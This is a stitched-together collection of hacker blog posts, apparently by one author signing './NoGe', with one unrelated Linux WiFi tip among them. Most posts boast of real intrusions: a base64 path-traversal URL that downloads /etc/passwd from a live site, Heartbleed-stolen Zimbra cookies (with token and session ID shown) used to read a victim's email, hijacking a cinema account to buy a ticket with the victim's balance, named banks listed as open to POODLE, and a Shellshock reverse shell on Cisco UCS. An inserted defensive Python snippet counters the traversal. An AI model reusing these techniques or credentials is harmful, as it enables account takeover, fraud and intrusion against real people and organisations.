While browsing I found this cool remote file download vulnerability. :)

http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true

If I open the link above, it will download a file for me. Now look at the path and file parameters. They are base64 encoded.

path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==

Decode both values and I get this.


path=system/modules/berita/files/download/
file=presentation_final.ppt

Now I know the path and the file name. What if I change them? Let's see.

path=L2V0Yy8=
file=cGFzc3dk

I changed the path value to /etc/ and the file value to passwd. Encode them to base64 first.

http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true

This modified link will download the passwd file from the system.



That's it.. :)


*some links and values in this PoC have been censored/changed coz this is a live website.
*admin has been notified by email
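
How a download handler can refuse the modified request above, as an added example that is not part of the original post and not the site's own code. `APP_ROOT`, `ALLOWED_DIR` and the function names are assumptions; the parameter values are the ones shown in the post.

```python
import base64
import binascii
import os

# Assumptions: APP_ROOT is a made-up install location; ALLOWED_DIR is the
# directory seen in the decoded `path` value from the post.
APP_ROOT = "/var/www/app"
ALLOWED_DIR = "system/modules/berita/files/download"


class RejectedRequest(Exception):
    """Raised when a download request must not be served."""


def decode_param(value):
    """Strictly decode one base64 query parameter to text."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise RejectedRequest("parameter is not valid base64 text") from exc
    if "\x00" in text:
        raise RejectedRequest("NUL byte in parameter")
    return text


def resolve_download(path_b64, file_b64):
    """Return the real path to serve, or raise RejectedRequest."""
    rel_dir = decode_param(path_b64)
    name = decode_param(file_b64)
    # The file parameter must be a bare name, never a path.
    if name in ("", ".", "..") or "/" in name or "\\" in name:
        raise RejectedRequest("file must be a bare file name")
    allowed = os.path.realpath(os.path.join(APP_ROOT, ALLOWED_DIR))
    # os.path.join drops APP_ROOT when rel_dir is absolute ("/etc/"), and
    # "../" segments climb out of it; realpath resolves both plus symlinks,
    # so the comparison is made on the path the OS would actually open.
    candidate = os.path.realpath(os.path.join(APP_ROOT, rel_dir, name))
    if candidate == allowed or os.path.commonpath([allowed, candidate]) != allowed:
        raise RejectedRequest("resolved path escapes the download directory")
    return candidate


if __name__ == "__main__":
    # Parameter values copied from the two URLs in the post.
    print(resolve_download("c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==",
                           "cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA=="))
    try:
        resolve_download("L2V0Yy8=", "cGFzc3dk")
    except RejectedRequest as err:
        print("rejected:", err)
```

Base64 here is only an encoding, so the check has to run on the decoded, resolved path. Dropping the client-supplied `path` parameter altogether and looking files up by an ID is stricter still.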



Well, this is an old vulnerability called Heartbleed (CVE-2014-0160). Let's exploit this.

Run the Heartbleed exploit and you'll get the Zimbra cookie.


See the Referer and Cookie? Use them to log in.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site https://mx.tempo.co.id/ in a Firefox that has the Cookie Injector plugin installed and press alt+c to show the Cookie Injector.


You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should get a popup screen saying "All Cookie Have Been Written".


Refresh (F5) the site again and you are now logged in to the user's email.


Type password in the search box and hit enter... :p



./NoGe

Hi, it's been a while since my last post.. :)



21 Cineplex is one of the largest cinema groups in Indonesia (Cinema 21, Cinema XXI and The Premiere). In this post I wanna show you guys how I buy a ticket using another person's account on the 21 Cineplex website. Well, this is an old vulnerability but they never fixed it, so let's have some fun. :p

Start by finding user cookies and a referer link.



I will use these cookies and this referer link. Open the referer link in a browser.



As we can see on the left side, I don't have access to this account. Now use the user cookies.
I'm using Cookie Injector to write the cookies.




Copy and paste the user cookies into Cookie Injector, then click OK and we'll get the screen below. This means the user cookies were written successfully.



Now reopen the referer link. I will automatically be logged in to the user page.



Let's buy a ticket with this account. The account balance is Rp. 165.000.
I wanna watch Inferno :)



Select the city, cinema, date, time and how many tickets we want to buy. Click CONTINUE, select a seat and click BUY NOW.




Transaction process.



And I have my free ticket.. :)
I also have the transaction code 11636 to pick up the ticket.



As we can see, the user balance is now Rp. 104.000.




That's it for today. I have a movie to watch. :p



Stay safe! Stay cool! :)

 

Hi all..

I'm using an HP ProBook with Kubuntu 14.04 but my WiFi keeps dropping the connection.
I have to reboot the laptop to connect to WiFi again.

I use this command to fix my WiFi problem and it's working fine.

echo "options rtl8723be fwlps=N ips=N" | sudo tee /etc/modprobe.d/rtl8723be.conf

Anyway, my chipset is Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter.

This setting can be different depending on your chipset.
To see your chipset, you can use this command.

lspci

I hope this is useful for you too!



./NoGe


Here are some Indonesian banks that are still vulnerable to the POODLE attack.
I'm using the SSL/TLS Security Test by High-Tech Bridge and a manual scan using nmap.

>> https://iperson.bankjatim.co.id

SSL/TLS Security Test


Script scan nmap



>> https://netbank.jtrustbank.co.id

SSL/TLS Security Test


Script scan nmap



>> https://cib.qnb.co.id

SSL/TLS Security Test


Script scan nmap



>> https://www.tunaiku.amarbank.co.id

SSL/TLS Security Test


Script scan nmap



>> https://www.nobuwwwbanking.com

SSL/TLS Security Test


Script scan nmap


Happy hunting guys!

Updated.
Some banks have been notified about this vulnerability.


./NoGe

Based on thatchrisecker. exploit at Exploit-DB.
I ran this exploit on Cisco UCS Manager version 2.1(3e) and it successfully returned a reverse bash shell.


Run netcat on my machine


Run the Cisco UCS Manager Shellshock Exploit


Bash shell on Cisco UCS Manager Machine





Happy hunting guys! :)



./NoGe

This bug was found by Michael "Artsploit" Stepankin. It's been reported and fixed by PayPal.







The full proof of concept is here.





./NoGe